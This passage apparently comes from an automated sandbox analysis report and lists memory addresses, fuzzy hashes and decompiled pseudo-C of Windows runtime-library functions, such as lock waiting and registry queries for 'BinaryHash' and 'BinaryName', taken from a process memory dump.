                                        0x053cfc47
                                        0x053cfc47
                                        0x053cfc49
                                        0x053cfcb2
                                        0x053cfcb4
                                        0x053cfcb6
                                        0x053cfcdc
                                        0x053cfcdc
                                        0x00000000
                                        0x053cfcb8
                                        0x053cfcc3
                                        0x053cfcc5
                                        0x053cfcc7
                                        0x00000000
                                        0x053cfcc9
                                        0x053cfcc9
                                        0x053cfccd
                                        0x00000000
                                        0x053cfccd
                                        0x053cfcc7
                                        0x00000000
                                        0x053cfc4b
                                        0x053cfc4b
                                        0x053cfc4e
                                        0x053cfc4e
                                        0x053cfc51
                                        0x053cfc51
                                        0x053cfc54
                                        0x053cfc5a
                                        0x053cfc5c
                                        0x053cfc5f
                                        0x053cfc61
                                        0x053cfc63
                                        0x053cfc65
                                        0x053cfc67
                                        0x053cfc6e
                                        0x053cfc72
                                        0x053cfc72
                                        0x053cfc72
                                        0x053cfc72
                                        0x053cfc67
                                        0x053cfc61
                                        0x00000000
                                        0x053cfc5a
                                        0x053cfc49
                                        0x053cfc41
                                        0x053cfc30
                                        0x053cfc27
                                        0x053cfc03
                                        0x053cfbcd
                                        0x053cfbd3
                                        0x053cfbd9
                                        0x053cfbdc
                                        0x053cfbde
                                        0x053cfc99
                                        0x053cfc9b
                                        0x053cfc9d
                                        0x053cfcd5
                                        0x053cfcd5
                                        0x053cfc89
                                        0x053cfc89
                                        0x00000000
                                        0x053cfc9f
                                        0x053cfc9f
                                        0x053cfca3
                                        0x00000000
                                        0x053cfca3
                                        0x00000000
                                        0x053cfbe4
                                        0x053cfbe4
                                        0x053cfbe4
                                        0x053cfbe4
                                        0x053cfbe9
                                        0x053cfbf2
                                        0x00000000
                                        0x053cfbf2
                                        0x053cfbde
                                        0x053cfbcb
                                        0x053cfbab
                                        0x053cfc8b
                                        0x053cfc8b
                                        0x053cfc8c
                                        0x053cfb80
                                        0x053cfb72
                                        0x053cfb5e
                                        0x053cfc8d
                                        0x053cfc91
                                        0x053cfadf
                                        0x053cfadf
                                        0x053cfae1
                                        0x053cfae4
                                        0x053cfae7
                                        0x053cfaec
                                        0x053cfaf8
                                        0x053cfb00
                                        0x053cfb07
                                        0x053cfb0f
                                        0x053cfb0f
                                        0x053cfb07
                                        0x00000000
                                        0x053cfaf8
                                        0x053cfadd

                                        Strings
                                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0540BE0F
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                        • API String ID: 0-865735534
                                        • Opcode ID: bc05a3fee43db4278f072f9126a2400a127fc7c31bf8a3febd98c55b78effae0
                                        • Instruction ID: e4239cf68cbfaf95afb8b057851858f9a8c77cfc7aac6e5a80da83cfd099dd46
                                        • Opcode Fuzzy Hash: bc05a3fee43db4278f072f9126a2400a127fc7c31bf8a3febd98c55b78effae0
                                        • Instruction Fuzzy Hash: 36A1CE72B106068BDB25DB68C454BBEBBA6FF48710F1485BEE8069B790DB74DC018B84
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 63%
                                        			E05392D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                        				signed char _v8;
                                        				signed int _v12;
                                        				signed int _v16;
                                        				signed int _v20;
                                        				signed int _v24;
                                        				intOrPtr _v28;
                                        				intOrPtr _v32;
                                        				signed int _v52;
                                        				void* __esi;
                                        				void* __ebp;
                                        				intOrPtr _t55;
                                        				signed int _t57;
                                        				signed int _t58;
                                        				char* _t62;
                                        				signed char* _t63;
                                        				signed char* _t64;
                                        				signed int _t67;
                                        				signed int _t72;
                                        				signed int _t77;
                                        				signed int _t78;
                                        				signed int _t88;
                                        				intOrPtr _t89;
                                        				signed char _t93;
                                        				signed int _t97;
                                        				signed int _t98;
                                        				signed int _t102;
                                        				signed int _t103;
                                        				intOrPtr _t104;
                                        				signed int _t105;
                                        				signed int _t106;
                                        				signed char _t109;
                                        				signed int _t111;
                                        				void* _t116;
                                        
                                        				_t102 = __edi;
                                        				_t97 = __edx;
                                        				_v12 = _v12 & 0x00000000;
                                        				_t55 =  *[fs:0x18];
                                        				_t109 = __ecx;
                                        				_v8 = __edx;
                                        				_t86 = 0;
                                        				_v32 = _t55;
                                        				_v24 = 0;
                                        				_push(__edi);
                                        				if(__ecx == 0x5485350) {
                                        					_t86 = 1;
                                        					_v24 = 1;
                                        					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                        				}
                                        				_t103 = _t102 | 0xffffffff;
                                        				if( *0x5487bc8 != 0) {
                                        					_push(0xc000004b);
                                        					_push(_t103);
                                        					E053D97C0();
                                        				}
                                        				if( *0x54879c4 != 0) {
                                        					_t57 = 0;
                                        				} else {
                                        					_t57 = 0x54879c8;
                                        				}
                                        				_v16 = _t57;
                                        				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                        					_t93 = _t109;
                                        					L23();
                                        				}
                                        				_t58 =  *_t109;
                                        				if(_t58 == _t103) {
                                        					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                        					_t58 = _t103;
                                        					if(__eflags == 0) {
                                        						_t93 = _t109;
                                        						E053C1624(_t86, __eflags);
                                        						_t58 =  *_t109;
                                        					}
                                        				}
                                        				_v20 = _v20 & 0x00000000;
                                        				if(_t58 != _t103) {
                                        					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                        				}
                                        				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                        				_t88 = _v16;
                                        				_v28 = _t104;
                                        				L9:
                                        				while(1) {
                                        					if(E053B7D50() != 0) {
                                        						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                        					} else {
                                        						_t62 = 0x7ffe0382;
                                        					}
                                        					if( *_t62 != 0) {
                                        						_t63 =  *[fs:0x30];
                                        						__eflags = _t63[0x240] & 0x00000002;
                                        						if((_t63[0x240] & 0x00000002) != 0) {
                                        							_t93 = _t109;
                                        							E0542FE87(_t93);
                                        						}
                                        					}
                                        					if(_t104 != 0xffffffff) {
                                        						_push(_t88);
                                        						_push(0);
                                        						_push(_t104);
                                        						_t64 = E053D9520();
                                        						goto L15;
                                        					} else {
                                        						while(1) {
                                        							_t97 =  &_v8;
                                        							_t64 = E053CE18B(_t109 + 4, _t97, 4, _t88, 0);
                                        							if(_t64 == 0x102) {
                                        								break;
                                        							}
                                        							_t93 =  *(_t109 + 4);
                                        							_v8 = _t93;
                                        							if((_t93 & 0x00000002) != 0) {
                                        								continue;
                                        							}
                                        							L15:
                                        							if(_t64 == 0x102) {
                                        								break;
                                        							}
                                        							_t89 = _v24;
                                        							if(_t64 < 0) {
                                        								L053EDF30(_t93, _t97, _t64);
                                        								_push(_t93);
                                        								_t98 = _t97 | 0xffffffff;
                                        								__eflags =  *0x5486901;
                                        								_push(_t109);
                                        								_v52 = _t98;
                                        								if( *0x5486901 != 0) {
                                        									_push(0);
                                        									_push(1);
                                        									_push(0);
                                        									_push(0x100003);
                                        									_push( &_v12);
                                        									_t72 = E053D9980();
                                        									__eflags = _t72;
                                        									if(_t72 < 0) {
                                        										_v12 = _t98 | 0xffffffff;
                                        									}
                                        								}
                                        								asm("lock cmpxchg [ecx], edx");
                                        								_t111 = 0;
                                        								__eflags = 0;
                                        								if(0 != 0) {
                                        									__eflags = _v12 - 0xffffffff;
                                        									if(_v12 != 0xffffffff) {
                                        										_push(_v12);
                                        										E053D95D0();
                                        									}
                                        								} else {
                                        									_t111 = _v12;
                                        								}
                                        								return _t111;
                                        							} else {
                                        								if(_t89 != 0) {
                                        									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                        									_t77 = E053B7D50();
                                        									__eflags = _t77;
                                        									if(_t77 == 0) {
                                        										_t64 = 0x7ffe0384;
                                        									} else {
                                        										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                        									}
                                        									__eflags =  *_t64;
                                        									if( *_t64 != 0) {
                                        										_t64 =  *[fs:0x30];
                                        										__eflags = _t64[0x240] & 0x00000004;
                                        										if((_t64[0x240] & 0x00000004) != 0) {
                                        											_t78 = E053B7D50();
                                        											__eflags = _t78;
                                        											if(_t78 == 0) {
                                        												_t64 = 0x7ffe0385;
                                        											} else {
                                        												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                        											}
                                        											__eflags =  *_t64 & 0x00000020;
                                        											if(( *_t64 & 0x00000020) != 0) {
                                        												_t64 = E05417016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                        											}
                                        										}
                                        									}
                                        								}
                                        								return _t64;
                                        							}
                                        						}
                                        						_t97 = _t88;
                                        						_t93 = _t109;
                                        						E0542FDDA(_t97, _v12);
                                        						_t105 =  *_t109;
                                        						_t67 = _v12 + 1;
                                        						_v12 = _t67;
                                        						__eflags = _t105 - 0xffffffff;
                                        						if(_t105 == 0xffffffff) {
                                        							_t106 = 0;
                                        							__eflags = 0;
                                        						} else {
                                        							_t106 =  *(_t105 + 0x14);
                                        						}
                                        						__eflags = _t67 - 2;
                                        						if(_t67 > 2) {
                                        							__eflags = _t109 - 0x5485350;
                                        							if(_t109 != 0x5485350) {
                                        								__eflags = _t106 - _v20;
                                        								if(__eflags == 0) {
                                        									_t93 = _t109;
                                        									E0542FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                        								}
                                        							}
                                        						}
                                        						_push("RTL: Re-Waiting\n");
                                        						_push(0);
                                        						_push(0x65);
                                        						_v20 = _t106;
                                        						E05425720();
                                        						_t104 = _v28;
                                        						_t116 = _t116 + 0xc;
                                        						continue;
                                        					}
                                        				}
                                        			}

                                        0x053efb1e
                                        0x053efb21
                                        0x053efb21
                                        0x05392ece
                                        0x05392ece
                                        0x05392ece
                                        0x05392ed7
                                        0x05392e61
                                        0x05392e63
                                        0x053efa6b
                                        0x053efa71
                                        0x053efa76
                                        0x053efa78
                                        0x053efa8a
                                        0x053efa7a
                                        0x053efa83
                                        0x053efa83
                                        0x053efa8f
                                        0x053efa91
                                        0x053efa97
                                        0x053efa9d
                                        0x053efaa4
                                        0x053efaaa
                                        0x053efaaf
                                        0x053efab1
                                        0x053efac3
                                        0x053efab3
                                        0x053efabc
                                        0x053efabc
                                        0x053efac8
                                        0x053efacb
                                        0x053efadf
                                        0x053efadf
                                        0x053efacb
                                        0x053efaa4
                                        0x053efa91
                                        0x05392e6f
                                        0x05392e6f
                                        0x05392e5f
                                        0x053efa13
                                        0x053efa15
                                        0x053efa17
                                        0x053efa1f
                                        0x053efa21
                                        0x053efa22
                                        0x053efa25
                                        0x053efa28
                                        0x053efa2f
                                        0x053efa2f
                                        0x053efa2a
                                        0x053efa2a
                                        0x053efa2a
                                        0x053efa31
                                        0x053efa34
                                        0x053efa36
                                        0x053efa3c
                                        0x053efa3e
                                        0x053efa41
                                        0x053efa43
                                        0x053efa45
                                        0x053efa45
                                        0x053efa41
                                        0x053efa3c
                                        0x053efa4a
                                        0x053efa4f
                                        0x053efa51
                                        0x053efa53
                                        0x053efa56
                                        0x053efa5b
                                        0x053efa5e
                                        0x00000000
                                        0x053efa5e
                                        0x05392e23

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID: RTL: Re-Waiting
                                        • API String ID: 0-316354757
                                        • Opcode ID: 17a2f421c13bcd2fcb59280a3e6f764d37ee7d9aa2ccfc8f62e250b530ee0120
                                        • Instruction ID: 16f418462906cb6860ec1124513f15230747f022e37d7906bcdb58f7fb12a422
                                        • Opcode Fuzzy Hash: 17a2f421c13bcd2fcb59280a3e6f764d37ee7d9aa2ccfc8f62e250b530ee0120
                                        • Instruction Fuzzy Hash: E76125B1F04A54ABDB25DF68C885BBF77F6FB84310F14066AE8529B6C0D7B499008B91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 80%
                                        			E05460EA5(void* __ecx, void* __edx) {
                                        				signed int _v20;
                                        				char _v24;
                                        				intOrPtr _v28;
                                        				unsigned int _v32;
                                        				signed int _v36;
                                        				intOrPtr _v40;
                                        				char _v44;
                                        				intOrPtr _v64;
                                        				void* __ebx;
                                        				void* __edi;
                                        				signed int _t58;
                                        				unsigned int _t60;
                                        				intOrPtr _t62;
                                        				char* _t67;
                                        				char* _t69;
                                        				void* _t80;
                                        				void* _t83;
                                        				intOrPtr _t93;
                                        				intOrPtr _t115;
                                        				char _t117;
                                        				void* _t120;
                                        
                                        				_t83 = __edx;
                                        				_t117 = 0;
                                        				_t120 = __ecx;
                                        				_v44 = 0;
                                        				if(E0545FF69(__ecx,  &_v44,  &_v32) < 0) {
                                        					L24:
                                        					_t109 = _v44;
                                        					if(_v44 != 0) {
                                        						E05461074(_t83, _t120, _t109, _t117, _t117);
                                        					}
                                        					L26:
                                        					return _t117;
                                        				}
                                        				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                        				_t5 = _t83 + 1; // 0x1
                                        				_v36 = _t5 << 0xc;
                                        				_v40 = _t93;
                                        				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                        				asm("sbb ebx, ebx");
                                        				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                        				if(_t58 != 0) {
                                        					_push(0);
                                        					_push(0x14);
                                        					_push( &_v24);
                                        					_push(3);
                                        					_push(_t93);
                                        					_push(0xffffffff);
                                        					_t80 = E053D9730();
                                        					_t115 = _v64;
                                        					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                        						_push(_t93);
                                        						E0545A80D(_t115, 1, _v20, _t117);
                                        						_t83 = 4;
                                        					}
                                        				}
                                        				if(E0545A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                        					goto L24;
                                        				}
                                        				_t60 = _v32;
                                        				_t97 = (_t60 != 0x100000) + 1;
                                        				_t83 = (_v44 -  *0x5488b04 >> 0x14) + (_v44 -  *0x5488b04 >> 0x14);
                                        				_v28 = (_t60 != 0x100000) + 1;
                                        				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                        				_v40 = _t62;
                                        				if(_t83 >= _t62) {
                                        					L10:
                                        					asm("lock xadd [eax], ecx");
                                        					asm("lock xadd [eax], ecx");
                                        					if(E053B7D50() == 0) {
                                        						_t67 = 0x7ffe0380;
                                        					} else {
                                        						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                        					}
                                        					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                        						E0545138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                        					}
                                        					if(E053B7D50() == 0) {
                                        						_t69 = 0x7ffe0388;
                                        					} else {
                                        						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                        					}
                                        					if( *_t69 != 0) {
                                        						E0544FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                        					}
                                        					if(( *0x5488724 & 0x00000008) != 0) {
                                        						E054552F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                        					}
                                        					_t117 = _v44;
                                        					goto L26;
                                        				}
                                        				while(E054615B5(0x5488ae4, _t83, _t97, _t97) >= 0) {
                                        					_t97 = _v28;
                                        					_t83 = _t83 + 2;
                                        					if(_t83 < _v40) {
                                        						continue;
                                        					}
                                        					goto L10;
                                        				}
                                        				goto L24;
                                        			}

























                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID: `
                                        • API String ID: 0-2679148245
                                        • Opcode ID: 04e41768da2d6edb9d3ca8693799fbc01c88ef515ed0f04524dafff41d5af94b
                                        • Instruction ID: 2e3facf4dc21f8f8496c6d9120122f68a9ab56516387ed94b28ba01fc8a6b39c
                                        • Opcode Fuzzy Hash: 04e41768da2d6edb9d3ca8693799fbc01c88ef515ed0f04524dafff41d5af94b
                                        • Instruction Fuzzy Hash: 6151DD713083429BD724DF29C988BABB7E5FBC4214F04096EF98687690D770E905CB62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 75%
                                        			E053CF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                        				intOrPtr _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				char* _v20;
                                        				intOrPtr _v24;
                                        				char _v28;
                                        				intOrPtr _v32;
                                        				char _v36;
                                        				char _v44;
                                        				char _v52;
                                        				intOrPtr _v56;
                                        				char _v60;
                                        				intOrPtr _v72;
                                        				void* _t51;
                                        				void* _t58;
                                        				signed short _t82;
                                        				short _t84;
                                        				signed int _t91;
                                        				signed int _t100;
                                        				signed short* _t103;
                                        				void* _t108;
                                        				intOrPtr* _t109;
                                        
                                        				_t103 = __ecx;
                                        				_t82 = __edx;
                                        				_t51 = E053B4120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                        				if(_t51 >= 0) {
                                        					_push(0x21);
                                        					_push(3);
                                        					_v56 =  *0x7ffe02dc;
                                        					_v20 =  &_v52;
                                        					_push( &_v44);
                                        					_v28 = 0x18;
                                        					_push( &_v28);
                                        					_push(0x100020);
                                        					_v24 = 0;
                                        					_push( &_v60);
                                        					_v16 = 0x40;
                                        					_v12 = 0;
                                        					_v8 = 0;
                                        					_t58 = E053D9830();
                                        					_t87 =  *[fs:0x30];
                                        					_t108 = _t58;
                                        					L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                        					if(_t108 < 0) {
                                        						L11:
                                        						_t51 = _t108;
                                        					} else {
                                        						_push(4);
                                        						_push(8);
                                        						_push( &_v36);
                                        						_push( &_v44);
                                        						_push(_v60);
                                        						_t108 = E053D9990();
                                        						if(_t108 < 0) {
                                        							L10:
                                        							_push(_v60);
                                        							E053D95D0();
                                        							goto L11;
                                        						} else {
                                        							_t109 = L053B4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                        							if(_t109 == 0) {
                                        								_t108 = 0xc0000017;
                                        								goto L10;
                                        							} else {
                                        								_t21 = _t109 + 0x18; // 0x18
                                        								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                        								 *_t109 = 1;
                                        								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                        								 *(_t109 + 0xe) = _t82;
                                        								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                        								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                        								E053DF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                        								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                        								 *((short*)(_t109 + 0xc)) =  *_t103;
                                        								_t91 =  *_t103 & 0x0000ffff;
                                        								_t100 = _t91 & 0xfffffffe;
                                        								_t84 = 0x5c;
                                        								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                        									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                        										_push(_v60);
                                        										E053D95D0();
                                        										L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                        										_t51 = 0xc0000106;
                                        									} else {
                                        										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                        										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                        										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                        										goto L5;
                                        									}
                                        								} else {
                                        									L5:
                                        									 *_a4 = _t109;
                                        									_t51 = 0;
                                        								}
                                        							}
                                        						}
                                        					}
                                        				}
                                        				return _t51;
                                        			}


























                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                        • Instruction ID: a4664a6e37e8df2e7f97bfdf70c9db1f1f94f2a9b64c2db89872f970238ab4f5
                                        • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                        • Instruction Fuzzy Hash: 8F515C726047109FD321DF19C840A6BBBF9FF48710F10892EF99597690E7B4E914CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 75%
                                        			E05413540(intOrPtr _a4) {
                                        				signed int _v12;
                                        				intOrPtr _v88;
                                        				intOrPtr _v92;
                                        				char _v96;
                                        				char _v352;
                                        				char _v1072;
                                        				intOrPtr _v1140;
                                        				intOrPtr _v1148;
                                        				char _v1152;
                                        				char _v1156;
                                        				char _v1160;
                                        				char _v1164;
                                        				char _v1168;
                                        				char* _v1172;
                                        				short _v1174;
                                        				char _v1176;
                                        				char _v1180;
                                        				char _v1192;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* __ebp;
                                        				short _t41;
                                        				short _t42;
                                        				intOrPtr _t80;
                                        				intOrPtr _t81;
                                        				signed int _t82;
                                        				void* _t83;
                                        
                                        				_v12 =  *0x548d360 ^ _t82;
                                        				_t41 = 0x14;
                                        				_v1176 = _t41;
                                        				_t42 = 0x16;
                                        				_v1174 = _t42;
                                        				_v1164 = 0x100;
                                        				_v1172 = L"BinaryHash";
                                        				_t81 = E053D0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                        				if(_t81 < 0) {
                                        					L11:
                                        					_t75 = _t81;
                                        					E05413706(0, _t81, _t79, _t80);
                                        					L12:
                                        					if(_a4 != 0xc000047f) {
                                        						E053DFA60( &_v1152, 0, 0x50);
                                        						_v1152 = 0x60c201e;
                                        						_v1148 = 1;
                                        						_v1140 = E05413540;
                                        						E053DFA60( &_v1072, 0, 0x2cc);
                                        						_push( &_v1072);
                                        						E053EDDD0( &_v1072, _t75, _t79, _t80, _t81);
                                        						E05420C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                        						_push(_v1152);
                                        						_push(0xffffffff);
                                        						E053D97C0();
                                        					}
                                        					return E053DB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                        				}
                                        				_t79 =  &_v352;
                                        				_t81 = E05413971(0, _a4,  &_v352,  &_v1156);
                                        				if(_t81 < 0) {
                                        					goto L11;
                                        				}
                                        				_t75 = _v1156;
                                        				_t79 =  &_v1160;
                                        				_t81 = E05413884(_v1156,  &_v1160,  &_v1168);
                                        				if(_t81 >= 0) {
                                        					_t80 = _v1160;
                                        					E053DFA60( &_v96, 0, 0x50);
                                        					_t83 = _t83 + 0xc;
                                        					_push( &_v1180);
                                        					_push(0x50);
                                        					_push( &_v96);
                                        					_push(2);
                                        					_push( &_v1176);
                                        					_push(_v1156);
                                        					_t81 = E053D9650();
                                        					if(_t81 >= 0) {
                                        						if(_v92 != 3 || _v88 == 0) {
                                        							_t81 = 0xc000090b;
                                        						}
                                        						if(_t81 >= 0) {
                                        							_t75 = _a4;
                                        							_t79 =  &_v352;
                                        							E05413787(_a4,  &_v352, _t80);
                                        						}
                                        					}
                                        					L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                        				}
                                        				_push(_v1156);
                                        				E053D95D0();
                                        				if(_t81 >= 0) {
                                        					goto L12;
                                        				} else {
                                        					goto L11;
                                        				}
                                        			}
































                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: BinaryHash
                                        • API String ID: 2994545307-2202222882
                                        • Opcode ID: ef9d2a24468b2f952e9153e2dca6bef91e99cde1b7da1d00bbf3acd369610abd
                                        • Instruction ID: 424c16942c52fe66373dd5c37bb53f7c11262f4c426a94253cf9b2d872e740bf
                                        • Opcode Fuzzy Hash: ef9d2a24468b2f952e9153e2dca6bef91e99cde1b7da1d00bbf3acd369610abd
                                        • Instruction Fuzzy Hash: 424125F2D0052C9BDB21DE50DC85FEEB77CAB44714F0045E6EA09A7240DB309E888FA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 72%
                                        			E05413884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                        				char _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr* _v16;
                                        				char* _v20;
                                        				short _v22;
                                        				char _v24;
                                        				intOrPtr _t38;
                                        				short _t40;
                                        				short _t41;
                                        				void* _t44;
                                        				intOrPtr _t47;
                                        				void* _t48;
                                        
                                        				_v16 = __edx;
                                        				_t40 = 0x14;
                                        				_v24 = _t40;
                                        				_t41 = 0x16;
                                        				_v22 = _t41;
                                        				_t38 = 0;
                                        				_v12 = __ecx;
                                        				_push( &_v8);
                                        				_push(0);
                                        				_push(0);
                                        				_push(2);
                                        				_t43 =  &_v24;
                                        				_v20 = L"BinaryName";
                                        				_push( &_v24);
                                        				_push(__ecx);
                                        				_t47 = 0;
                                        				_t48 = E053D9650();
                                        				if(_t48 >= 0) {
                                        					_t48 = 0xc000090b;
                                        				}
                                        				if(_t48 != 0xc0000023) {
                                        					_t44 = 0;
                                        					L13:
                                        					if(_t48 < 0) {
                                        						L16:
                                        						if(_t47 != 0) {
                                        							L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                        						}
                                        						L18:
                                        						return _t48;
                                        					}
                                        					 *_v16 = _t38;
                                        					 *_a4 = _t47;
                                        					goto L18;
                                        				}
                                        				_t47 = L053B4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                        				if(_t47 != 0) {
                                        					_push( &_v8);
                                        					_push(_v8);
                                        					_push(_t47);
                                        					_push(2);
                                        					_push( &_v24);
                                        					_push(_v12);
                                        					_t48 = E053D9650();
                                        					if(_t48 < 0) {
                                        						_t44 = 0;
                                        						goto L16;
                                        					}
                                        					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                        						_t48 = 0xc000090b;
                                        					}
                                        					_t44 = 0;
                                        					if(_t48 < 0) {
                                        						goto L16;
                                        					} else {
                                        						_t17 = _t47 + 0xc; // 0xc
                                        						_t38 = _t17;
                                        						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                        							_t48 = 0xc000090b;
                                        						}
                                        						goto L13;
                                        					}
                                        				}
                                        				_t48 = _t48 + 0xfffffff4;
                                        				goto L18;
                                        			}
















                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: BinaryName
                                        • API String ID: 2994545307-215506332
                                        • Opcode ID: bcb07029bdcc9b98946357c0226d5dc8e7092886cf5d101b2eaafd2d4fc5ddac
                                        • Instruction ID: 1706a118cb7b6d047eded1524166f0b78e42994a24098aebfc77b96ba7ad352c
                                        • Opcode Fuzzy Hash: bcb07029bdcc9b98946357c0226d5dc8e7092886cf5d101b2eaafd2d4fc5ddac
                                        • Instruction Fuzzy Hash: 6F31F172D04509AFEB15DE58C945EBBB7B5FB80B20F01456AED16A7350D7309E00C7A4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 33%
                                        			E053CD294(void* __ecx, char __edx, void* __eflags) {
                                        				signed int _v8;
                                        				char _v52;
                                        				signed int _v56;
                                        				signed int _v60;
                                        				intOrPtr _v64;
                                        				char* _v68;
                                        				intOrPtr _v72;
                                        				char _v76;
                                        				signed int _v84;
                                        				intOrPtr _v88;
                                        				char _v92;
                                        				intOrPtr _v96;
                                        				intOrPtr _v100;
                                        				char _v104;
                                        				char _v105;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t35;
                                        				char _t38;
                                        				signed int _t40;
                                        				signed int _t44;
                                        				signed int _t52;
                                        				void* _t53;
                                        				void* _t55;
